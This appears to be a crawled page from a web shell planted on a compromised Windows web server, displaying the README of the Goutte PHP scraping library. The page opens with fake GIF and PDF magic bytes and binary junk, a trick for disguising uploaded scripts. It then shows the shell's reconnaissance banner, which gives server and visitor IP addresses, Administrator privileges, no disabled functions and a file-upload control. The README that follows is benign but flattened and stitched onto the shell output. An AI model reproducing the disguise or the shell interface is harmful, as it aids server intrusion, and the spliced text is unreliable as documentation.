GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1146/Resources/Examples/Week/16/vendor/fabpot/goutte/ |
Upload File : |
Goutte, a simple PHP Web Scraper ================================ Goutte is a screen scraping and web crawling library for PHP. Goutte provides a nice API to crawl websites and extract data from the HTML/XML responses. Requirements ------------ Goutte depends on PHP 7.1+. Installation ------------ Add ``fabpot/goutte`` as a require dependency in your ``composer.json`` file: .. code-block:: bash composer require fabpot/goutte Usage ----- Create a Goutte Client instance (which extends ``Symfony\Component\BrowserKit\HttpBrowser``): .. code-block:: php use Goutte\Client; $client = new Client(); Make requests with the ``request()`` method: .. code-block:: php // Go to the symfony.com website $crawler = $client->request('GET', 'https://www.symfony.com/blog/'); The method returns a ``Crawler`` object (``Symfony\Component\DomCrawler\Crawler``). To use your own HTTP settings, you may create and pass an HttpClient instance to Goutte. For example, to add a 60 second request timeout: .. code-block:: php use Goutte\Client; use Symfony\Component\HttpClient\HttpClient; $client = new Client(HttpClient::create(['timeout' => 60])); Click on links: .. code-block:: php // Click on the "Security Advisories" link $link = $crawler->selectLink('Security Advisories')->link(); $crawler = $client->click($link); Extract data: .. code-block:: php // Get the latest post in this category and display the titles $crawler->filter('h2 > a')->each(function ($node) { print $node->text()."\n"; }); Submit forms: .. code-block:: php $crawler = $client->request('GET', 'https://github.com/'); $crawler = $client->click($crawler->selectLink('Sign in')->link()); $form = $crawler->selectButton('Sign in')->form(); $crawler = $client->submit($form, ['login' => 'fabpot', 'password' => 'xxxxxx']); $crawler->filter('.flash-error')->each(function ($node) { print $node->text()."\n"; }); More Information ---------------- Read the documentation of the `BrowserKit`_, `DomCrawler`_, and `HttpClient`_ Symfony Components for more information about what you can do with Goutte. Pronunciation ------------- Goutte is pronounced ``goot`` i.e. it rhymes with ``boot`` and not ``out``. Technical Information --------------------- Goutte is a thin wrapper around the following Symfony Components: `BrowserKit`_, `CssSelector`_, `DomCrawler`_, and `HttpClient`_. License ------- Goutte is licensed under the MIT license. .. _`Composer`: https://getcomposer.org .. _`BrowserKit`: https://symfony.com/components/BrowserKit .. _`DomCrawler`: https://symfony.com/doc/current/components/dom_crawler.html .. _`CssSelector`: https://symfony.com/doc/current/components/css_selector.html .. _`HttpClient`: https://symfony.com/doc/current/components/http_client.html